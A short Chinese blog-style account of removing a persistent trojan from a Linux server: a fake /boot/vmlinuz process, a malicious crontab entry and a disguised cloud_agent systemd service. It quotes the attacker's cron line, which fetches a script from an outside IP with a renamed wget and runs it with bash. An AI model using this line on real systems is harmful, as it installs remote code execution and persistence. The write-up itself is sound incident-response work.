接上文,那个木马上次的解决方法是恢复前一天的镜像,但是并没有真正解决这个问题,过几天,木马又出现了,CPU 一直100%,进程的名字是/boot/vmlinuz
再次恢复到前一天的镜像还是没有解决。
随后在同事的帮忙下一起解决这个木马,以下是记录的过程:
1. 查看进程实际运行程序文件
ll /proc/22767/exe
22767是进程号,/boot/ 下并没有vmlinuz文件,随即发现实际运行程序是在 /tmp/ 下一个随机文件
2. 删除 /tmp/ 下所有文件
删除后,再kill进程有点效果,没有马上出现新的进程。但是5分钟后进程又出现了。说明应该有类似定时的任务
3. 检查定时任务
crontab -l
果真发现可疑定时任务,
*/5 * * * * /usr/bin/wgetak -q -O /tmp/seasame http://51.15.56.161:443 && bash /tmp/seasame
查了一下这个ip是荷兰的,wget 命令是常用的命令,而 wgetak 估计是一个木马带的一个类似 wget 的命令,不断的从这个ip下载脚本,存到/tmp/seasame下,然后这个脚本生成一个随机的文件来运行,脚本的内容如下:
对应的解决措施包括以下几步:
- 删除 /usr/bin/wgetak 文件
- crontab -e 命令删除对应的定时任务
- 继续删除 /tmp 下所有文件,kill 进程
以上措施做完,还是担心隐藏了什么启动服务。
4. 搜索包含 wgetak 的文件
grep "wgetak" /etc/ -nri
在 /etc/systemd/system/cloud_agent.service 里找到了,文件伪装成类似阿里的后台云监控服务名。
果断删除之。
重启机器,恢复正常。不太清楚这个木马的作用是什么,挖矿?也不确定什么漏洞导致感染木马,Google并不能查到类似的问题。或许服务器还是有很大风险。